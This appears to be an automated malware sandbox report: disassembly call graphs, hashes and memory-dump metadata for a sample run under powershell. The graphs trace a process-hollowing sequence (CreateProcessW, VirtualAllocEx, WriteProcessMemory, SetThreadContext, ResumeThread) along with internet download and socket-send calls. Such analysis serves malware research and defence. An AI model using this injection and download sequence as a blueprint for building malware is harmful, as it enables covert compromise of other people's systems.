                                                                                                                          • Instruction ID: 262808d0b03a22c9d1f5287038a167ad6f4b5e297c78b5a4e796a221e4211927
                                                                                                                          • Opcode Fuzzy Hash: d10b129c176e3ae5ac06dd0882e8f2f8247b40be312e0ab70bad379cea685368
                                                                                                                          • Instruction Fuzzy Hash: 01D25C386002049FDB15DF54C890AAABBB6FF89314F24C59AEC0997356DB32ED86CF51
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.411674608.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_450000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4'p$$p$$p
                                                                                                                          • API String ID: 0-2931952147
                                                                                                                          • Opcode ID: d1db630fd3d0e462cbc4514c4b98197bdd010388692d92db3e382fa05fc9c620
                                                                                                                          • Instruction ID: faa385bad975ee0d354ff6fd7fe24643d75db282634785ea62f1f85e0b10e1fe
                                                                                                                          • Opcode Fuzzy Hash: d1db630fd3d0e462cbc4514c4b98197bdd010388692d92db3e382fa05fc9c620
                                                                                                                          • Instruction Fuzzy Hash: 4731FA39604305DFCB258E7484606BB7BA1AFA1316F144167DC0497293DB78DD49CB6A

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 692 2a7928-2a79a1 693 2a79a9-2a79b0 692->693 694 2a79a3-2a79a6 692->694 695 2a79bb-2a79d1 693->695 696 2a79b2-2a79b8 693->696 694->693 697 2a79dc-2a7a7f CreateProcessW 695->697 698 2a79d3-2a79d9 695->698 696->695 700 2a7a88-2a7b00 697->700 701 2a7a81-2a7a87 697->701 698->697 708 2a7b12-2a7b19 700->708 709 2a7b02-2a7b08 700->709 701->700 710 2a7b1b-2a7b2a 708->710 711 2a7b30 708->711 709->708 710->711 712 2a7b31 711->712 712->712
                                                                                                                          APIs
                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 002A7A6C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.411634303.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcess
                                                                                                                          • String ID: h-B
                                                                                                                          • API String ID: 963392458-24984025
                                                                                                                          • Opcode ID: ebd947bbe09f805a1583a7b18d86a0c45df5867a07430d080dae9559836de6fd
                                                                                                                          • Instruction ID: 79fc27f73ffdf20119f4bde15ef6da228bddbf0a7bc1d2a632293c3f7e0a0139
                                                                                                                          • Opcode Fuzzy Hash: ebd947bbe09f805a1583a7b18d86a0c45df5867a07430d080dae9559836de6fd
                                                                                                                          • Instruction Fuzzy Hash: E25138B190121ADFDB24CF99CD40BDEBBB5BF48304F1084AAE909B7250DB709A89CF50

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 714 2a7ce0-2a7d26 715 2a7d28-2a7d2e 714->715 716 2a7d30-2a7d69 WriteProcessMemory 714->716 715->716 717 2a7d6b-2a7d71 716->717 718 2a7d72-2a7d93 716->718 717->718
                                                                                                                          APIs
                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 002A7D5C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.411634303.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3559483778-0
                                                                                                                          • Opcode ID: 35439a9f67869aafb41320a52f87ed0d3e7298650c2428799bcecf139a8caa8f
                                                                                                                          • Instruction ID: b60863676344b90045ad7c82c4ae8f9ecc64694a9f91d6e6b5886e1050bcd3e0
                                                                                                                          • Opcode Fuzzy Hash: 35439a9f67869aafb41320a52f87ed0d3e7298650c2428799bcecf139a8caa8f
                                                                                                                          • Instruction Fuzzy Hash: 2621E5B19107099FDB10CF9AD884BEEBBF4FF49310F50842AE958A7250D378A954CFA5

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 720 2a7b68-2a7ba8 721 2a7baa-2a7bb2 720->721 722 2a7bb4-2a7be0 Wow64SetThreadContext 720->722 721->722 723 2a7be9-2a7c0a 722->723 724 2a7be2-2a7be8 722->724 724->723
                                                                                                                          APIs
                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 002A7BD3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.411634303.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 983334009-0
                                                                                                                          • Opcode ID: 6e8c47d74dd3470d74a852347861069428214e43a0ec2a669d2230dc73bc1e1d
                                                                                                                          • Instruction ID: 52e9f8296789cd266bedc8480976631b46480c45be8f9d1d3012f9e5c9db934b
                                                                                                                          • Opcode Fuzzy Hash: 6e8c47d74dd3470d74a852347861069428214e43a0ec2a669d2230dc73bc1e1d
                                                                                                                          • Instruction Fuzzy Hash: 351134B2D142098FDB10CF9AC844BDEFBF4EB89320F14842AD458A3300D778A945CFA5

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 726 2a6ef8-2a6f08 call 2a182c 729 2a6e48-2a6e86 ResumeThread 726->729 730 2a6f0e-2a6f1c 726->730 731 2a6e88-2a6e8e 729->731 732 2a6e8f-2a6e9c 729->732 733 2a68ed-2a68f0 730->733 734 2a6f22-2a6f25 730->734 731->732 735 2a739b-2a73a2 732->735 736 2a6ea2-2a6eb3 732->736 737 2a71f0-2a71f9 733->737 738 2a68f6-2a70f4 VirtualAllocEx 733->738 734->733 736->733 740 2a6eb9-2a6ebc 736->740 741 2a72a8-2a72c8 737->741 742 2a71ff-2a7212 737->742 745 2a70fd-2a711a 738->745 746 2a70f6-2a70fc 738->746 740->733 752 2a72ca-2a72cf 741->752 753 2a72d3-2a72d6 741->753 742->733 745->733 748 2a7120-2a7123 745->748 746->745 748->733 752->753 754 2a72d8 753->754 755 2a72f3-2a730a 753->755 754->755 756 2a7338-2a73f0 754->756 757 2a730e-2a7317 754->757 758 2a72df-2a72ed 754->758 755->753 765 2a730c 755->765 759 2a7319-2a7323 757->759 760 2a733f-2a7361 757->760 758->753 764 2a72ef-2a72f1 758->764 769 2a732c call 2a5254 759->769 770 2a7325-2a732a 759->770 771 2a6871-2a6874 760->771 772 2a7367-2a736a 760->772 764->753 765->753 778 2a7331-2a7336 769->778 770->753 774 2a687a-2a68c3 771->774 775 2a7374-2a738d 771->775 772->771 781 2a68d7 774->781 782 2a68c5-2a68d5 774->782 775->771 777 2a7393-2a7396 775->777 777->771 778->753 783 2a68dc-2a68de 781->783 782->783 784 2a6af7-2a6b1e call 2a1814 783->784 785 2a68e4-2a68e9 783->785 788 2a694b-2a69e0 784->788 789 2a6b24-2a6b35 784->789 785->733 808 2a69e7-2a6a4a 788->808 789->733 790 2a6b3b-2a6b3e 789->790 790->733 808->784
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.411634303.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ResumeThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 947044025-0
                                                                                                                          • Opcode ID: eb1d36c624dadbbc00b16d16b40ab45cae64252c9f447115b2dc46b6c09a5668
                                                                                                                          • Instruction ID: e89dd084a9191072bf1d3de6568f5f473171636ad97655ff4995f70eb9e4e397
                                                                                                                          • Opcode Fuzzy Hash: eb1d36c624dadbbc00b16d16b40ab45cae64252c9f447115b2dc46b6c09a5668
                                                                                                                          • Instruction Fuzzy Hash: E711DE34A24214CFEB20CF54C94CBA8B7B6BB06314F2881D9D1096B299CBB8DD9DCF11

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 819 2a6e48-2a6e86 ResumeThread 820 2a6e88-2a6e8e 819->820 821 2a6e8f-2a6e9c 819->821 820->821 822 2a739b-2a73a2 821->822 823 2a6ea2-2a6eb3 821->823 825 2a6eb9-2a6ebc 823->825 826 2a68ed-2a68f0 823->826 825->826 827 2a71f0-2a71f9 826->827 828 2a68f6-2a70f4 VirtualAllocEx 826->828 829 2a72a8-2a72c8 827->829 830 2a71ff-2a7212 827->830 833 2a70fd-2a711a 828->833 834 2a70f6-2a70fc 828->834 840 2a72ca-2a72cf 829->840 841 2a72d3-2a72d6 829->841 830->826 833->826 836 2a7120-2a7123 833->836 834->833 836->826 840->841 842 2a72d8 841->842 843 2a72f3-2a730a 841->843 842->843 844 2a7338-2a73f0 842->844 845 2a730e-2a7317 842->845 846 2a72df-2a72ed 842->846 843->841 853 2a730c 843->853 847 2a7319-2a7323 845->847 848 2a733f-2a7361 845->848 846->841 852 2a72ef-2a72f1 846->852 857 2a732c-2a7336 call 2a5254 847->857 858 2a7325-2a732a 847->858 859 2a6871-2a6874 848->859 860 2a7367-2a736a 848->860 852->841 853->841 857->841 858->841 862 2a687a-2a68c3 859->862 863 2a7374-2a738d 859->863 860->859 869 2a68d7 862->869 870 2a68c5-2a68d5 862->870 863->859 865 2a7393-2a7396 863->865 865->859 871 2a68dc-2a68de 869->871 870->871 872 2a6af7-2a6b1e call 2a1814 871->872 873 2a68e4-2a68e9 871->873 876 2a694b-2a6a4a 872->876 877 2a6b24-2a6b35 872->877 873->826 876->872 877->826 878 2a6b3b-2a6b3e 877->878 878->826
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.411634303.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_2a0000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ResumeThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 947044025-0
                                                                                                                          • Opcode ID: 1c95c2d245389818a504cb71cf4b927a01f97bba467e4677a390285ac988bc3e
                                                                                                                          • Instruction ID: 0df942683a2ca0fb14da6c51f8c450f1ad995ab3388e4163becbdc642d494fb0
                                                                                                                          • Opcode Fuzzy Hash: 1c95c2d245389818a504cb71cf4b927a01f97bba467e4677a390285ac988bc3e
                                                                                                                          • Instruction Fuzzy Hash: 5C01A434914214CFEB208F54D94C798BBB5BB06314F2884DAD1096B295CBB88DDDDF16

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 907 451f00-451f27 908 451f54-451f8a 907->908 909 451f29-451f2e 907->909 917 451f90-451fa1 908->917 918 45204a-452077 908->918 910 451f46-451f4e 909->910 911 451f30-451f36 909->911 915 451f53 910->915 912 451f38 911->912 913 451f3a-451f44 911->913 912->910 913->910 924 451fa3-451fa9 917->924 925 451fbb-451fd8 917->925 922 4520a4-4520cf 918->922 923 452079-45207e 918->923 936 4520d1-4520d6 922->936 937 4520fc-452132 922->937 926 452096-4520a3 923->926 927 452080-452086 923->927 928 451fad-451fb9 924->928 929 451fab 924->929 925->918 938 451fda-451ffc 925->938 930 452088 927->930 931 45208a-452094 927->931 928->925 929->925 930->926 931->926 940 4520ee-4520fb 936->940 941 4520d8-4520de 936->941 951 452134 937->951 952 45213b-45214f 937->952 946 452016-45202e 938->946 947 451ffe-452004 938->947 944 4520e0 941->944 945 4520e2-4520ec 941->945 944->940 945->940 958 452030-452032 946->958 959 45203c-452047 946->959 953 452006 947->953 954 452008-452014 947->954 951->952 953->946 954->946 958->959
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.411674608.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_450000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: tPp
                                                                                                                          • API String ID: 0-1477601333
                                                                                                                          • Opcode ID: 1b101b930a9261a8e83c3d7be7d262b1bfd3dac31bc410a425c308a5022db0a6
                                                                                                                          • Instruction ID: 492a3a69f9334b4e424081061887fa138aeb248a672c39b7aff200e00b84bbf5
                                                                                                                          • Opcode Fuzzy Hash: 1b101b930a9261a8e83c3d7be7d262b1bfd3dac31bc410a425c308a5022db0a6
                                                                                                                          • Instruction Fuzzy Hash: F941E83160A3909FC7128B548C61A9AFFB1AF47711F1980DBD984DF2A3C7759C4AC7A2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.411599417.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_15d000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5460208a997ff6cd35284786f2bc2fc71bdd4f467a50719699942c445635bca1
                                                                                                                          • Instruction ID: 81e267b17e436d0b0e908d1ec899c63312ee0c65bc68f8cf94e914cd770da2d6
                                                                                                                          • Opcode Fuzzy Hash: 5460208a997ff6cd35284786f2bc2fc71bdd4f467a50719699942c445635bca1
                                                                                                                          • Instruction Fuzzy Hash: 23018F71508340EAE7304E29E884B66BF98EF41725F28841AFC594E2C6C779D849CBB1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.411599417.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_15d000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f64fd6ea1580cfa3cc0687ffdd5e9fe6b0ead217b9937536cbfa8d385b68c705
                                                                                                                          • Instruction ID: 75f3d46dc39b586403f27931d4497bacf0dc000d6f5f287e479f7b9b47beb0ed
                                                                                                                          • Opcode Fuzzy Hash: f64fd6ea1580cfa3cc0687ffdd5e9fe6b0ead217b9937536cbfa8d385b68c705
                                                                                                                          • Instruction Fuzzy Hash: C101526240D3C09FD7224B259C94B62BFA4DF53225F1980DBEC888F2E7C2699C48C772
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.411674608.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_450000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $;:$(::$(::$(::$4'p$4'p$L4p$L4p$L4p$L4p$L4p$L4p$L::$L::$L::$$p$$p
                                                                                                                          • API String ID: 0-2242653082
                                                                                                                          • Opcode ID: b5747d00c871c1c7576776c33260b18bfb46d080684c7e3422b545850a1ae30f
                                                                                                                          • Instruction ID: 922a4a56eaa5e61af4770024f0334473b85946ca10459fe9b9047d81d1db2fa1
                                                                                                                          • Opcode Fuzzy Hash: b5747d00c871c1c7576776c33260b18bfb46d080684c7e3422b545850a1ae30f
                                                                                                                          • Instruction Fuzzy Hash: 23E11A39700204EFCB258E68D4547AF7BE2AF85311F188067ED459B392CB75CD89CBA6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.411674608.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_450000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 00*$l;:$tPp$tPp$$p
                                                                                                                          • API String ID: 0-4210060881
                                                                                                                          • Opcode ID: 44d263ec9705d8c2c032a8f49939065ba07b4a160ea605c506696697b8f85ba4
                                                                                                                          • Instruction ID: 325ebbc3aac8a1b5ebe47477be8a86dda9bb7a43c8e6429eb16260f8200961e2
                                                                                                                          • Opcode Fuzzy Hash: 44d263ec9705d8c2c032a8f49939065ba07b4a160ea605c506696697b8f85ba4
                                                                                                                          • Instruction Fuzzy Hash: 65B12635B042109FCB159B69D940BABBBB2EF86311F18C0ABED498B342DB75CC45C7A1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.411674608.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_450000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: L4p$L4p$L4p$p::
                                                                                                                          • API String ID: 0-3256382991
                                                                                                                          • Opcode ID: e9e17728b39af5cc96ad1b89fef55bce5aa7dc3436b0b88b930afadc48157705
                                                                                                                          • Instruction ID: 0d42944ddc84a7478299f443e6e744e89e13994ceecfcdaa15734d8c6e775b1e
                                                                                                                          • Opcode Fuzzy Hash: e9e17728b39af5cc96ad1b89fef55bce5aa7dc3436b0b88b930afadc48157705
                                                                                                                          • Instruction Fuzzy Hash: 3B616839700208AFCB159A28C850BBF7BA2AFC5301F188466ED558B393CB74DD45CB96

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:5.9%
                                                                                                                          Dynamic/Decrypted Code Coverage:19.7%
                                                                                                                          Signature Coverage:4%
                                                                                                                          Total number of Nodes:1515
                                                                                                                          Total number of Limit Nodes:43
                                                                                                                          execution_graph 53073 415d41 53088 41b411 53073->53088 53075 415d4a 53099 4020f6 53075->53099 53080 4170c4 53123 401e8d 53080->53123 53084 401fd8 11 API calls 53085 4170d9 53084->53085 53086 401fd8 11 API calls 53085->53086 53087 4170e5 53086->53087 53129 4020df 53088->53129 53093 41b456 InternetReadFile 53098 41b479 53093->53098 53094 41b4a6 InternetCloseHandle InternetCloseHandle 53096 41b4b8 53094->53096 53096->53075 53097 401fd8 11 API calls 53097->53098 53098->53093 53098->53094 53098->53097 53140 4020b7 53098->53140 53100 40210c 53099->53100 53101 4023ce 11 API calls 53100->53101 53102 402126 53101->53102 53103 402569 28 API calls 53102->53103 53104 402134 53103->53104 53105 404aa1 53104->53105 53106 404ab4 53105->53106 53207 40520c 53106->53207 53108 404ac9 ctype 53109 404b40 WaitForSingleObject 53108->53109 53110 404b20 53108->53110 53112 404b56 53109->53112 53111 404b32 send 53110->53111 53113 404b7b 53111->53113 53213 4210cb 55 API calls 53112->53213 53116 401fd8 11 API calls 53113->53116 53115 404b69 SetEvent 53115->53113 53117 404b83 53116->53117 53118 401fd8 11 API calls 53117->53118 53119 404b8b 53118->53119 53119->53080 53120 401fd8 53119->53120 53121 4023ce 11 API calls 53120->53121 53122 401fe1 53121->53122 53122->53080 53124 402163 53123->53124 53128 40219f 53124->53128 53231 402730 11 API calls 53124->53231 53126 402184 53232 402712 11 API calls std::_Deallocate 53126->53232 53128->53084 53130 4020e7 53129->53130 53146 4023ce 53130->53146 53132 4020f2 53133 43bda0 53132->53133 53138 4461b8 ___crtLCMapStringA 53133->53138 53134 4461f6 53162 44062d 20 API calls _abort 53134->53162 53135 4461e1 RtlAllocateHeap 53137 41b42f InternetOpenW InternetOpenUrlW 53135->53137 53135->53138 53137->53093 53138->53134 53138->53135 53161 443001 7 API calls 2 library calls 53138->53161 53141 4020bf 53140->53141 53142 4023ce 11 API calls 53141->53142 53143 4020ca 53142->53143 53163 40250a 53143->53163 53145 4020d9 53145->53098 53147 402428 53146->53147 53148 4023d8 53146->53148 53147->53132 53148->53147 53150 4027a7 53148->53150 53151 402e21 53150->53151 53154 4016b4 53151->53154 53153 402e30 53153->53147 53155 4016c6 53154->53155 53156 4016cb 53154->53156 53160 43bd68 11 API calls _abort 53155->53160 53156->53155 53157 4016f3 53156->53157 53157->53153 53159 43bd67 53160->53159 53161->53138 53162->53137 53164 40251a 53163->53164 53165 402520 53164->53165 53166 402535 53164->53166 53170 402569 53165->53170 53180 4028e8 53166->53180 53169 402533 53169->53145 53191 402888 53170->53191 53172 40257d 53173 402592 53172->53173 53174 4025a7 53172->53174 53196 402a34 22 API calls 53173->53196 53176 4028e8 28 API calls 53174->53176 53179 4025a5 53176->53179 53177 40259b 53197 4029da 22 API calls 53177->53197 53179->53169 53181 4028f1 53180->53181 53182 402953 53181->53182 53183 4028fb 53181->53183 53205 4028a4 22 API calls 53182->53205 53186 402904 53183->53186 53188 402917 53183->53188 53199 402cae 53186->53199 53187 402915 53187->53169 53188->53187 53190 4023ce 11 API calls 53188->53190 53190->53187 53192 402890 53191->53192 53193 402898 53192->53193 53198 402ca3 22 API calls 53192->53198 53193->53172 53196->53177 53197->53179 53200 402cb8 __EH_prolog 53199->53200 53206 402e54 22 API calls 53200->53206 53202 4023ce 11 API calls 53204 402d92 53202->53204 53203 402d24 53203->53202 53204->53187 53206->53203 53208 405214 53207->53208 53209 4023ce 11 API calls 53208->53209 53210 40521f 53209->53210 53214 405234 53210->53214 53212 40522e 53212->53108 53213->53115 53215 405240 53214->53215 53216 40526e 53214->53216 53217 4028e8 28 API calls 53215->53217 53230 4028a4 22 API calls 53216->53230 53219 40524a 53217->53219 53219->53212 53231->53126 53232->53128 53233 10006d60 53234 10006d69 53233->53234 53236 10006d72 53233->53236 53237 10006c5f 53234->53237 53257 10005af6 GetLastError 53237->53257 53239 10006c6c 53277 10006d7e 53239->53277 53241 10006c74 53286 100069f3 53241->53286 53244 10006c8b 53244->53236 53247 10006cce 53311 1000571e 19 API calls _free 53247->53311 53251 10006cc9 53310 10006368 19 API calls _abort 53251->53310 53253 10006d12 53253->53247 53313 100068c9 25 API calls 53253->53313 53254 10006ce6 53254->53253 53312 1000571e 19 API calls _free 53254->53312 53258 10005b12 53257->53258 53259 10005b0c 53257->53259 53263 10005b61 SetLastError 53258->53263 53315 1000637b 19 API calls 2 library calls 53258->53315 53314 10005e08 10 API calls 2 library calls 53259->53314 53262 10005b24 53264 10005b2c 53262->53264 53317 10005e5e 10 API calls 2 library calls 53262->53317 53263->53239 53316 1000571e 19 API calls _free 53264->53316 53266 10005b41 53266->53264 53268 10005b48 53266->53268 53318 1000593c 19 API calls _abort 53268->53318 53269 10005b32 53271 10005b6d SetLastError 53269->53271 53320 100055a8 36 API calls _abort 53271->53320 53272 10005b53 53319 1000571e 19 API calls _free 53272->53319 53276 10005b5a 53276->53263 53276->53271 53278 10006d8a ___DestructExceptionObject 53277->53278 53279 10005af6 _abort 36 API calls 53278->53279 53284 10006d94 53279->53284 53281 10006e18 _abort 53281->53241 53284->53281 53321 100055a8 36 API calls _abort 53284->53321 53322 10005671 RtlEnterCriticalSection 53284->53322 53323 1000571e 19 API calls _free 53284->53323 53324 10006e0f RtlLeaveCriticalSection _abort 53284->53324 53325 100054a7 53286->53325 53289 10006a14 GetOEMCP 53291 10006a3d 53289->53291 53290 10006a26 53290->53291 53292 10006a2b GetACP 53290->53292 53291->53244 53293 100056d0 53291->53293 53292->53291 53294 1000570e 53293->53294 53298 100056de _abort 53293->53298 53336 10006368 19 API calls _abort 53294->53336 53295 100056f9 RtlAllocateHeap 53297 1000570c 53295->53297 53295->53298 53297->53247 53300 10006e20 53297->53300 53298->53294 53298->53295 53335 1000474f 7 API calls 2 library calls 53298->53335 53301 100069f3 38 API calls 53300->53301 53304 10006e3f 53301->53304 53302 10006e46 53347 10002ada 53302->53347 53303 10006eb5 ___scrt_fastfail 53337 10006acb GetCPInfo 53303->53337 53304->53302 53304->53303 53307 10006e90 IsValidCodePage 53304->53307 53306 10006cc1 53306->53251 53306->53254 53307->53302 53308 10006ea2 GetCPInfo 53307->53308 53308->53302 53308->53303 53310->53247 53311->53244 53312->53253 53313->53247 53314->53258 53315->53262 53316->53269 53317->53266 53318->53272 53319->53276 53322->53284 53323->53284 53324->53284 53326 100054c4 53325->53326 53332 100054ba 53325->53332 53327 10005af6 _abort 36 API calls 53326->53327 53326->53332 53328 100054e5 53327->53328 53333 10007a00 36 API calls __fassign 53328->53333 53330 100054fe 53334 10007a2d 36 API calls __fassign 53330->53334 53332->53289 53332->53290 53333->53330 53334->53332 53335->53298 53336->53297 53343 10006b05 53337->53343 53346 10006baf 53337->53346 53340 10002ada _ValidateLocalCookies 5 API calls 53342 10006c5b 53340->53342 53342->53302 53354 100086e4 53343->53354 53345 10008a3e 41 API calls 53345->53346 53346->53340 53348 10002ae3 53347->53348 53349 10002ae5 IsProcessorFeaturePresent 53347->53349 53348->53306 53351 10002b58 53349->53351 53424 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53351->53424 53353 10002c3b 53353->53306 53355 100054a7 __fassign 36 API calls 53354->53355 53356 10008704 MultiByteToWideChar 53355->53356 53358 10008742 53356->53358 53366 100087da 53356->53366 53362 100056d0 20 API calls 53358->53362 53363 10008763 ___scrt_fastfail 53358->53363 53359 10002ada _ValidateLocalCookies 5 API calls 53360 10006b66 53359->53360 53368 10008a3e 53360->53368 53361 100087d4 53373 10008801 19 API calls _free 53361->53373 53362->53363 53363->53361 53365 100087a8 MultiByteToWideChar 53363->53365 53365->53361 53367 100087c4 GetStringTypeW 53365->53367 53366->53359 53367->53361 53369 100054a7 __fassign 36 API calls 53368->53369 53370 10008a51 53369->53370 53374 10008821 53370->53374 53373->53366 53375 1000883c 53374->53375 53376 10008862 MultiByteToWideChar 53375->53376 53377 10008a16 53376->53377 53378 1000888c 53376->53378 53379 10002ada _ValidateLocalCookies 5 API calls 53377->53379 53382 100056d0 20 API calls 53378->53382 53384 100088ad 53378->53384 53380 10006b87 53379->53380 53380->53345 53381 100088f6 MultiByteToWideChar 53383 1000890f 53381->53383 53400 10008962 53381->53400 53382->53384 53401 10005f19 53383->53401 53384->53381 53384->53400 53388 10008971 53390 10008992 53388->53390 53391 100056d0 20 API calls 53388->53391 53389 10008939 53393 10005f19 10 API calls 53389->53393 53389->53400 53392 10008a07 53390->53392 53395 10005f19 10 API calls 53390->53395 53391->53390 53409 10008801 19 API calls _free 53392->53409 53393->53400 53396 100089e6 53395->53396 53396->53392 53397 100089f5 WideCharToMultiByte 53396->53397 53397->53392 53398 10008a35 53397->53398 53411 10008801 19 API calls _free 53398->53411 53410 10008801 19 API calls _free 53400->53410 53412 10005c45 53401->53412 53403 10005f40 53406 10005f49 53403->53406 53416 10005fa1 9 API calls 2 library calls 53403->53416 53405 10005f89 LCMapStringW 53405->53406 53407 10002ada _ValidateLocalCookies 5 API calls 53406->53407 53408 10005f9b 53407->53408 53408->53388 53408->53389 53408->53400 53409->53400 53410->53377 53411->53400 53413 10005c71 53412->53413 53415 10005c75 __crt_fast_encode_pointer 53412->53415 53413->53415 53417 10005ce1 53413->53417 53415->53403 53416->53405 53418 10005d02 LoadLibraryExW 53417->53418 53419 10005cf7 53417->53419 53420 10005d37 53418->53420 53421 10005d1f GetLastError 53418->53421 53419->53413 53420->53419 53423 10005d4e FreeLibrary 53420->53423 53421->53420 53422 10005d2a LoadLibraryExW 53421->53422 53422->53420 53423->53419 53424->53353 53425 434906 53430 434bd8 SetUnhandledExceptionFilter 53425->53430 53427 43490b pre_c_initialization 53431 4455cc 20 API calls 2 library calls 53427->53431 53429 434916 53430->53427 53431->53429 53432 1000c7a7 53433 1000c7be 53432->53433 53438 1000c82c 53432->53438 53433->53438 53442 1000c7e6 GetModuleHandleA 53433->53442 53434 1000c872 53435 1000c835 GetModuleHandleA 53437 1000c83f 53435->53437 53437->53437 53437->53438 53438->53434 53438->53435 53443 1000c7ef 53442->53443 53449 1000c82c 53442->53449 53452 1000c803 53443->53452 53445 1000c872 53446 1000c835 GetModuleHandleA 53447 1000c83f 53446->53447 53447->53447 53447->53449 53449->53445 53449->53446 53453 1000c809 53452->53453 53454 1000c82c 53453->53454 53455 1000c80d VirtualProtect 53453->53455 53457 1000c835 GetModuleHandleA 53454->53457 53458 1000c872 53454->53458 53455->53454 53456 1000c81c VirtualProtect 53455->53456 53456->53454 53459 1000c83f 53457->53459 53459->53454 53460 43bea8 53463 43beb4 _swprintf ___scrt_is_nonwritable_in_current_image 53460->53463 53461 43bec2 53476 44062d 20 API calls _abort 53461->53476 53463->53461 53464 43beec 53463->53464 53471 445909 EnterCriticalSection 53464->53471 53466 43bec7 ___scrt_is_nonwritable_in_current_image _abort 53467 43bef7 53472 43bf98 53467->53472 53471->53467 53473 43bfa6 53472->53473 53473->53473 53475 43bf02 53473->53475 53478 4497ec 37 API calls 2 library calls 53473->53478 53477 43bf1f 